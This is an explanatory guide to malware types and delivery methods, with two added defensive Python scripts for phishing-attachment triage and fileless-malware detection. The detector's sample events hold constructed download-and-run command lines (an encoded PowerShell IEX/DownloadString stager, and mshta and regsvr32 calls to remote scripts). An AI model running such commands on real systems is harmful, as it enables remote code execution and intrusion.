Cyberattacks and malware are among the biggest threats on the internet.
Here is Part 2 of our guide to the different types of malware, and how to avoid falling victim to them.
What is adware?
The ultimate goal of many cybercriminals is to make money, and for some, adware is the way to do it. Adware does what it says on the tin: it's designed to push adverts onto the user, often in such a way that the only way to get rid of them is to click through to the advert. For the cybercriminals, each click brings in additional revenue.
In most cases, the malicious adverts aren't there to steal data from the victim or damage the device; they are just annoying enough to push the user into repeatedly clicking on pop-up windows. On mobile devices, however, this can easily lead to extreme battery drain or render the device unusable because the influx of pop-up windows takes up the whole screen.
What is a botnet?
A botnet, short for robot network, is a network of machines that cybercriminals have secretly hijacked using malware; it can range from a handful to millions of compromised devices. A botnet is not malware in itself, but these networks are usually built by infecting vulnerable devices.
Each of the machines falls under the control of a single attacking operation, which can remotely issue commands to all of the infected machines from a single point, the command and control (C2) server.
By issuing commands to all the infected computers in the zombie network, attackers can carry out coordinated large-scale campaigns, including DDoS attacks, which leverage the power of the army of devices to flood a victim with traffic, overwhelming their website or service to such an extent it goes offline.
Other common attacks carried out by botnets include spam email attachment campaigns — which can also be used to recruit more machines into the network — and attempts to steal financial data, while smaller botnets have also been used in attempts to compromise specific targets.
Botnets are designed to stay quiet to ensure the user is completely oblivious that their machine is under the control of an attacker.
As more devices become connected to the internet, more devices are becoming targets for botnets. The infamous Mirai botnet, which disrupted major internet services in late 2016, was largely made up of Internet of Things devices such as routers, IP cameras and DVRs, which could easily be roped into the network thanks to their default credentials, missing patches and lack of malware removal tools.
What is cryptocurrency miner malware?
The high-profile rise of bitcoin has helped push cryptocurrency into the public eye. In many instances, people aren't even buying it, but are dedicating a portion of their computers' processing power to mine for it.
While plenty of internet users mine on their own terms (it's so popular that the demand has helped push up the price of PC gaming graphics cards), cryptocurrency mining is also being abused by cyber attackers.
There's nothing underhanded or illegal about cryptocurrency mining in itself, but in order to acquire as much currency as possible, be it bitcoin, Monero, Ethereum or something else, some cybercriminals use malware to secretly take over PCs and put them to work in a mining botnet, all without the victim being aware their PC has been compromised. This is often called cryptojacking.
One of the largest criminal mining networks, the Smominru botnet, is thought to consist of over 500,000 systems and to have made its operators at least $3.6 million from mining Monero.
Typically, a cryptojacking attack delivers mining code to a target machine and uses the computer's processing power to run mining operations in the background.
The problem for the user of the infected system is that it can be slowed almost to a complete stop as the miner consumes a large share of its processing power, which to the victim looks as if it is happening for no reason.
PCs and Windows servers can be used for cryptocurrency mining, but Internet of Things devices are also popular targets for illicit mining. The poor security and always-connected nature of many IoT devices make them attractive targets, especially as the device in question is likely to have been installed and then forgotten about.
Analysis by Cisco Talos suggests a single system compromised with a cryptocurrency miner could mine about $0.28 worth of Monero a day at the prices used in the analysis. That might sound like a tiny amount, but an enslaved network of 2,000 systems would bring in around $568 per day, or over $200,000 a year.
How is malware delivered?
Before the pervasive spread of the World Wide Web, malware and viruses had to be delivered physically, on a floppy disk or CD-ROM.
In many cases, malware is still delivered on an external device, although nowadays it is most likely to arrive on a USB flash drive. There are instances of USB sticks being left in car parks outside targeted organisations, in the hope that someone picks one up out of curiosity and plugs it into a computer connected to the corporate network.
Far more common now, however, is malware delivered by phishing email, with the payload distributed as an email attachment or behind a link.
The quality of these spam emails varies widely. Some attackers make minimal effort, perhaps sending an email containing nothing but a randomly named attachment.
In this instance, the attackers are hoping to chance upon someone naive enough to open email attachments or click links without thinking about it, and who doesn't have any sort of malware protection installed.
A slightly more sophisticated form of phishing is when attackers send large volumes of messages claiming the user has won a contest, needs to check their online bank account, has missed a delivery, needs to pay taxes, or is even required to attend court, along with various other messages which on first viewing may cause the target to react instantly.
For example, if the message has an attachment explaining (falsely) that the user is being summoned to court, the shock may lead them to open the attachment, or click a link, to get more information. This runs the malware; ransomware and trojans are often delivered this way.
If the attackers have a specific target in mind, the phishing email can be tailored to lure people within one organisation, or even a single individual. This approach, known as spear phishing, is the one most often associated with the most sophisticated malware campaigns.
However, there are many other ways for malware to spread that do not require any action by the end user, for example worms that exploit vulnerabilities in network-facing software and move from machine to machine across the network.
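The attachment lures described above (urgency wording, an executable disguised with a double extension, a script hidden in an archive) are the sort of thing a mail gateway or analyst triage script checks for. The following is an added example, not code from the original article: it builds a constructed sample message with Python's standard `email` module, then walks its attachments, flags risky extensions and double extensions, compares the declared content type against the file's magic bytes, looks inside zip attachments, and scans the subject and body for the urgency words the article lists. The extension lists, lure words and the example.invalid addresses are assumptions chosen for the demonstration.

```python
import email
import io
import zipfile
from email import policy
from email.message import EmailMessage

# Extensions that run directly when opened on a typical Windows desktop (assumed list, not exhaustive)
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse", "vbs",
                   "vbe", "wsf", "hta", "ps1", "lnk", "jar", "msi"}
# Office formats that can carry macros
MACRO_EXTS = {"docm", "xlsm", "pptm", "dotm", "xltm"}
# Benign-looking inner extensions used in double-extension names such as invoice.pdf.exe
DECOY_EXTS = {"pdf", "doc", "docx", "xls", "jpg", "txt"}
# Urgency words of the kind the article describes (constructed list)
LURE_WORDS = ("court", "summons", "invoice", "delivery", "tax", "won", "account", "urgent")
# File signatures used to check what an attachment really is, whatever it claims to be
MAGIC = {b"MZ": "pe-executable", b"%PDF": "pdf", b"PK\x03\x04": "zip", b"\xd0\xcf\x11\xe0": "ole-office"}


def sniff(data: bytes) -> str:
    """Identify an attachment by its leading bytes rather than its declared type."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return "unknown"


def check_name(name: str) -> list[str]:
    """Flag executable, macro-enabled and double-extension file names."""
    findings = []
    parts = name.lower().split(".")
    if len(parts) < 2:
        return findings
    ext = parts[-1]
    if ext in EXECUTABLE_EXTS:
        findings.append(f"executable attachment: {name}")
    if ext in MACRO_EXTS:
        findings.append(f"macro-enabled document: {name}")
    if len(parts) > 2 and parts[-2] in DECOY_EXTS:
        findings.append(f"double extension: {name}")
    return findings


def triage(raw: bytes) -> list[str]:
    """Parse a raw RFC 822 message and return a list of human-readable findings."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings: list[str] = []
    body_part = msg.get_body(preferencelist=("plain", "html"))
    body = body_part.get_content() if body_part is not None else ""
    text = (msg.get("Subject", "") + " " + body).lower()
    lures = [w for w in LURE_WORDS if w in text]
    if lures:
        findings.append("urgency lure words: " + ", ".join(lures))
    for part in msg.iter_attachments():
        name = part.get_filename() or "(unnamed)"
        data = part.get_payload(decode=True) or b""
        findings += check_name(name)
        kind = sniff(data)
        if kind == "pe-executable":
            findings.append(f"PE header in attachment {name} declared as {part.get_content_type()}")
        if kind == "zip":
            try:
                with zipfile.ZipFile(io.BytesIO(data)) as z:
                    for member in z.namelist():
                        findings += [f"inside {name}: {f}" for f in check_name(member)]
            except zipfile.BadZipFile:
                findings.append(f"malformed archive: {name}")
    return findings


def build_sample() -> bytes:
    """Constructed court-summons lure with two typical malicious attachments (not a real message)."""
    m = EmailMessage()
    m["From"] = "clerk@example.invalid"
    m["To"] = "victim@example.invalid"
    m["Subject"] = "Notice: you are required to attend court"
    m.set_content("See the attached summons for details.")
    # A 'PDF' that is really a PE stub (MZ header) behind a double extension
    m.add_attachment(b"MZ" + b"\x00" * 62, maintype="application", subtype="pdf",
                     filename="summons.pdf.exe")
    # A zip wrapping a JScript file, a common way to slip a script past extension filters
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("case_details.js", "WScript.Echo('constructed sample');")
    m.add_attachment(buf.getvalue(), maintype="application", subtype="zip",
                     filename="case_details.zip")
    return bytes(m)


if __name__ == "__main__":
    for finding in triage(build_sample()):
        print(finding)
```

Checking magic bytes against the declared content type is the important step: a filter that trusts `Content-Type: application/pdf` or the visible `.pdf` in the name is exactly what a double-extension lure is built to fool.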
What is fileless malware?
As traditional malware attacks are slowed by prevention tactics, including robust anti-virus or anti-malware systems, and as users become more cautious of unexpected emails and strange attachments, attackers are being forced to find other ways to deliver their malicious payloads.
One increasingly common means is fileless malware. Rather than relying on the traditional method of downloading and executing a malicious file on disk, which anti-virus software can often detect, the attack is delivered in a different way.
Instead of requiring execution from a dropped file, fileless malware relies on exploits (sometimes zero-days) or on scripts launched directly in memory, techniques that can infect endpoints without leaving a tell-tale file behind.
This works because the attack uses a system's own trusted files and services, such as PowerShell or Windows Management Instrumentation, to gain access to devices and launch nefarious activity, all while remaining undetected because a file-scanning anti-virus has no malicious file to flag.
Abusing the system's own infrastructure in this way lets attackers run scripts, establish persistence, and connect out to command and control servers, providing a means of stealthily conducting their activity.
The nature of fileless malware means it is not only difficult to detect but also difficult for some forms of anti-virus software to protect against. Ensuring that systems are patched and up to date, preventing users from running with admin privileges, and logging script execution (PowerShell logging, for instance) can help.
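Because a fileless attack leaves no file to scan, detection has to look at process behaviour instead: which trusted binary was launched, by what parent, and with what command line. The following is an added example written for this article, not the author's or any vendor's code. It runs a few detection rules over constructed process-creation events in a Sysmon-like shape (parent image, image, command line): an Office application spawning a script host, PowerShell launched hidden with an encoded command (which it decodes from the UTF-16LE base64 that `-EncodedCommand` expects and scans for in-memory download-and-run keywords), and signed Windows utilities such as mshta.exe and regsvr32.exe being pointed at remote scripts. The rule lists, the example.invalid URLs and the event records are assumptions built for the demonstration.

```python
import base64
import re

# Parents that should rarely spawn a script host, and the script hosts themselves (assumed lists)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# PowerShell switches typical of a hidden, non-interactive stager
PS_FLAGS = (
    (re.compile(r"\s-nop\b", re.I), "no profile"),
    (re.compile(r"\s-w(?:indowstyle)?\s+hidden\b", re.I), "hidden window"),
    (re.compile(r"\s-noni\b", re.I), "non-interactive"),
    (re.compile(r"\s-e(?:xecutionpolicy|p)\s+bypass\b", re.I), "execution policy bypass"),
)
# -EncodedCommand and its abbreviations take base64 of a UTF-16LE script
ENC_FLAG = re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# Keywords that mark download-and-run-in-memory rather than a dropped file
MEMORY_KEYWORDS = ("iex", "invoke-expression", "downloadstring", "frombase64string",
                   "reflection.assembly", "memorystream")
# Signed Windows binaries commonly abused to fetch or run remote script ("living off the land")
LOLBIN_PATTERNS = {
    "mshta.exe": re.compile(r"https?:|javascript:|vbscript:", re.I),
    "regsvr32.exe": re.compile(r"/i:\S*https?:|scrobj\.dll", re.I),
    "rundll32.exe": re.compile(r"javascript:", re.I),
    "wmic.exe": re.compile(r"format:\s*\"?https?:", re.I),
    "certutil.exe": re.compile(r"-urlcache", re.I),
}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(b64: str) -> str:
    """Recover the script behind -EncodedCommand; empty string if the base64 is malformed."""
    try:
        return base64.b64decode(b64).decode("utf-16le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def analyse(event: dict) -> list[str]:
    """Apply the rules to one process-creation event and return the findings."""
    parent, image = basename(event["parent_image"]), basename(event["image"])
    cmd = event["command_line"]
    findings = []
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        findings.append(f"{parent} spawned {image}")
    if image in ("powershell.exe", "pwsh.exe"):
        findings += [label for pat, label in PS_FLAGS if pat.search(cmd)]
        enc = ENC_FLAG.search(cmd)
        script = decode_encoded_command(enc.group(1)) if enc else cmd
        if enc:
            findings.append("decoded -EncodedCommand: " + script.strip())
        hits = [k for k in MEMORY_KEYWORDS if re.search(r"\b" + re.escape(k) + r"\b", script, re.I)]
        if hits:
            findings.append("in-memory execution keywords: " + ", ".join(hits))
    pat = LOLBIN_PATTERNS.get(image)
    if pat and pat.search(cmd):
        findings.append(f"living-off-the-land use of {image}")
    return findings


def scan(events) -> dict:
    """Map each event id to its list of findings (empty list means nothing flagged)."""
    return {e["id"]: analyse(e) for e in events}


# Constructed stager: what a macro document typically launches, encoded the way PowerShell expects
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENCODED = base64.b64encode(STAGER.encode("utf-16le")).decode()

# Constructed process-creation events in a Sysmon-like shape; events 4 and 5 are benign controls
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"id": 2, "parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe http://example.invalid/x.hta"},
    {"id": 3, "parent_image": r"C:\Windows\System32\svchost.exe", "image": r"C:\Windows\System32\regsvr32.exe",
     "command_line": "regsvr32.exe /s /n /u /i:http://example.invalid/s.sct scrobj.dll"},
    {"id": 4, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe Get-ChildItem C:\Users"},
    {"id": 5, "parent_image": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for event_id, findings in scan(SAMPLE_EVENTS).items():
        print(event_id, findings or "clean")
```

None of these rules needs a file on disk: the parent-child relationship, the command-line switches and the decoded script are all available from process-creation logging, which is why enabling that logging (and PowerShell script block logging) matters more against fileless tradecraft than adding signatures.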